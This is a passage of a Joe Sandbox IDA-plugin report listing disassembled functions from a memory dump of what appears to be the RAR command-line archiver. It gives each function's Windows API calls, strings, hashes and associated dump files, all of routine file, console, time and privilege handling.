Opcode ID: 17cd7ac6b45fac6070adc0eed57ad23b885bbd446d6d7546a3a2cd6d53a87c8d
Instruction ID: a4e2a236ec60494ac0de88a58a6c2081809f026a803bd402bb57d658f93ca5ff
Opcode Fuzzy Hash: 17cd7ac6b45fac6070adc0eed57ad23b885bbd446d6d7546a3a2cd6d53a87c8d
Instruction Fuzzy Hash: 18022732B086A286EB21DF25E4646AE73A5FB987C4F600535FE5D8779ADE3DE440C700

Function 00007FF60E5C49B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF60E5C4BD8

Part of subcall function 00007FF60E60B6D0: Sleep.KERNEL32(?,?,?,?,00007FF60E5DCBED,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E60B730

Part of subcall function 00007FF60E5E1E80: CreateFileW.KERNELBASE ref: 00007FF60E5E1F4A
Part of subcall function 00007FF60E5E1E80: GetLastError.KERNEL32 ref: 00007FF60E5E1F59
Part of subcall function 00007FF60E5E1E80: CreateFileW.KERNELBASE ref: 00007FF60E5E1F99
Part of subcall function 00007FF60E5E1E80: GetLastError.KERNEL32 ref: 00007FF60E5E1FA2
Part of subcall function 00007FF60E5E1E80: SetFileTime.KERNEL32 ref: 00007FF60E5E1FF1

Strings

, xrefs: 00007FF60E5C4F01
%12s %s, xrefs: 00007FF60E5C4E8E
%12s %s, xrefs: 00007FF60E5C4E58
%s, xrefs: 00007FF60E5C4EAF

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$SleepTime
String ID: %12s %s$%12s %s$ $%s
API String ID: 2965465231-221484280
Opcode ID: e34f920fa60ea98e423a9e05b5cc19c384a7f8142988e5059d6ffbdfe646cb29
Instruction ID: 2f3fcf1e50422c1eac9cf28393c75fe91b5aebbf4a3b290d244c5cbcf7da837c
Opcode Fuzzy Hash: e34f920fa60ea98e423a9e05b5cc19c384a7f8142988e5059d6ffbdfe646cb29
Instruction Fuzzy Hash: 02F1E062B09A628AEB22DB12E0706BE6761FB64B84F644C31FA4D87785DF3ED555C300

Function 00007FF60E624C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF60E624C89
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF60E624CA1
RtlVirtualUnwind.KERNEL32 ref: 00007FF60E624CDC
IsDebuggerPresent.KERNEL32 ref: 00007FF60E624D15
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF60E624D1F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF60E624D2A

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction ID: 12a6c31cb9b09ab55e4015a023e8fe75842a9dd5f0bb43c2346b72ea306d1c0f
Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction Fuzzy Hash: AB317F32628F9186EB60CF24F8402AE73A0FBA4794F640135FA9D83B59DF38D545CB00

Function 00007FF60E5DEF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60E5DEE47), ref: 00007FF60E5DEF73
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF60E5DEE47), ref: 00007FF60E5DEF84
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF60E5DEFA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF60E5DEFCA
GetLastError.KERNEL32 ref: 00007FF60E5DEFD4
CloseHandle.KERNEL32 ref: 00007FF60E5DEFE7

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction ID: 77a175d7925c9245a7d3cacfdf2a9d9e5814d0768deb591cd67db8692f06aaf1
Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction Fuzzy Hash: E6117232A2C75282E7908F61F45056AB3A5FB98B80F645436FA8E83628DF3CD008CB40

Function 00007FF60E626130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF60E6262AD

Strings

inf, xrefs: 00007FF60E6261B6
NAN(SNAN), xrefs: 00007FF60E6261C5
nan, xrefs: 00007FF60E626198
NAN, xrefs: 00007FF60E626191
NAN(IND), xrefs: 00007FF60E6261DB
INF, xrefs: 00007FF60E6261A3
nan(ind), xrefs: 00007FF60E6261E6
nan(snan), xrefs: 00007FF60E6261D0

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction ID: 308bbcd3f8547703952c8a6197181d0fa8c2b5fd85960b5fb08e67d201fc4973
Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction Fuzzy Hash: CF41BA72A29F6589E704CF64F8417ED37A4EB28388F20413AFE9C87B94DE38D4259340

Function 00007FF60E5D7988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00000000,00000100,?,?,00000002,00007FF60E5D7892), ref: 00007FF60E5D79BC
GetStdHandle.KERNEL32 ref: 00007FF60E5D79CA
GetConsoleMode.KERNEL32 ref: 00007FF60E5D79E0
GetConsoleMode.KERNEL32 ref: 00007FF60E5D79EE
SetConsoleMode.KERNEL32 ref: 00007FF60E5D79FC
SetConsoleMode.KERNEL32 ref: 00007FF60E5D7A0A
ReadConsoleW.KERNEL32 ref: 00007FF60E5D7A24
SetConsoleMode.KERNEL32 ref: 00007FF60E5D7A3A
SetConsoleMode.KERNEL32 ref: 00007FF60E5D7A47

Part of subcall function 00007FF60E5D82E4: fflush.LIBCMT ref: 00007FF60E5D832F

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Console$Mode$Handle$Readfflush
String ID:
API String ID: 1039280553-0
Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction ID: 2ce8c583b468924f4ae9319027a117402b715b3360f20d90dd8500973271c6b4
Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction Fuzzy Hash: F221C225B2866393FA509F31F810179A364FBA9BA0F240131FE4A43764DE3DE44AD700

Function 00007FF60E60BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF60E5E6754: GetVersionExW.KERNEL32 ref: 00007FF60E5E6785

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF60E60BCEF
FileTimeToSystemTime.KERNEL32 ref: 00007FF60E60BCFB
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF60E60BD0B
SystemTimeToFileTime.KERNEL32 ref: 00007FF60E60BD19
SystemTimeToFileTime.KERNEL32 ref: 00007FF60E60BD27
FileTimeToSystemTime.KERNEL32 ref: 00007FF60E60BD68

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction ID: 188a453a39918c60f9373a9ddebcc6fd17a4e5b9d54eddb1d9f13e63dd837e36
Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction Fuzzy Hash: 50514EB2B246658AEB54CFB4E4405AC37B1F758788B60803AEE0E97B58EF38D555CB00

Function 00007FF60E5FEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF60E5C72C4: new.LIBCMT ref: 00007FF60E5C73DE

new.LIBCMT ref: 00007FF60E5FEBB4

Strings

rebuilt., xrefs: 00007FF60E5FECA3
exe, xrefs: 00007FF60E5FECDC
rar, xrefs: 00007FF60E5FECF2
sfx, xrefs: 00007FF60E5FECC9

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID: exe$rar$rebuilt.$sfx
API String ID: 0-13699710
Opcode ID: a089de7db546ec3fe26c7bfa736cb08088992f1168ee6607c265857eb037a30e
Instruction ID: f10d92d651ab01f8464b6c8bb4f3b8259e23168c350f318d6baf702d2187d97d
Opcode Fuzzy Hash: a089de7db546ec3fe26c7bfa736cb08088992f1168ee6607c265857eb037a30e
Instruction Fuzzy Hash: AD81E921A1C6A285EA32DB64E4312FD1391FFA5394F604931FA5D8B6DBDE2EE505C700

Function 00007FF60E61E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

abort.LIBCMT ref: 00007FF60E61E0F4
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF60E61E1BC
RtlUnwindEx.KERNEL32 ref: 00007FF60E61E20B

Strings

csm, xrefs: 00007FF60E61E1A2
f, xrefs: 00007FF60E61E13A

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabort
String ID: csm$f
API String ID: 3913153233-629598281
Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction ID: b803fbeaa90821c5a1ce5a4976b00c77ffdf81cc50584ad89037f21d4d1f633a
Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction Fuzzy Hash: CA61F736B2866286EB15DFA1F414A7937A1FB64794F288570FE0E83744DF3AF840A701

Function 00007FF60E5DEA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32(?,00007FF60E5DEBC2), ref: 00007FF60E5DEA7C
GetFileSecurityW.ADVAPI32(?,00007FF60E5DEBC2), ref: 00007FF60E5DEABC
GetSecurityDescriptorLength.ADVAPI32(?,00007FF60E5DEBC2), ref: 00007FF60E5DEB0A

Strings

, xrefs: 00007FF60E5DEAE3
ACL, xrefs: 00007FF60E5DEB39

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Security$File$DescriptorLength
String ID: $ACL
API String ID: 2361174398-1852320022
Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction ID: 7f9443cd7688c605441e9ddf91878aa7497c553ce75ad93410c59feef24ac373
Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction Fuzzy Hash: DB31A265B1DA9292FA21DB20F4613E963A5FBA8780F900431FA8DC3756DF3DE605C700

Function 00007FF60E60BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF60E60BC8C: FileTimeToLocalFileTime.KERNEL32 ref: 00007FF60E60BCEF
Part of subcall function 00007FF60E60BC8C: FileTimeToSystemTime.KERNEL32 ref: 00007FF60E60BD68

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E60BEAE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E60BED8

Strings

%u-%02u-%02u %02u:%02u, xrefs: 00007FF60E60BEB8
????-??-?? ??:??, xrefs: 00007FF60E60BEDF
%u-%02u-%02u %02u:%02u:%02u,%09u, xrefs: 00007FF60E60BE80

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Time$File$swprintf$LocalSystem
String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
API String ID: 1364621626-1794493780
Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction ID: a2e307b8e149c0c817768d65a8532c7a041c6898070dcac4715c8531a7b4862c
Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction Fuzzy Hash: BD21E4B6A282618EE750CF64E480A9E77F0F758794F248022FE58D3B48DF39E9418F10

Function 00007FF60E5D80C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF60E5D814D
CharToOemA.USER32 ref: 00007FF60E5D81D8
WriteFile.KERNEL32 ref: 00007FF60E5D81FB
GetStdHandle.KERNEL32 ref: 00007FF60E5D8242
WriteConsoleW.KERNEL32 ref: 00007FF60E5D8266

Part of subcall function 00007FF60E60D840: WideCharToMultiByte.KERNEL32 ref: 00007FF60E60D871

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CharHandleWrite$ByteConsoleFileMultiWide
String ID:
API String ID: 643171463-0
Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction ID: 711003bc8828bf458457b48d04d76d4b89c60fe82feef61992cdacbb810c823f
Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction Fuzzy Hash: 66412761F1DAA242F9259B60B8202B96250BF75BB0F201339FD6D977E1CE3CE549D300

Function 00007FF60E6269B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF60E626AD6

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction ID: c595da304aca96a0d9195b2faa2d2f68e2c79229a1cb6acab7074573db7694d6
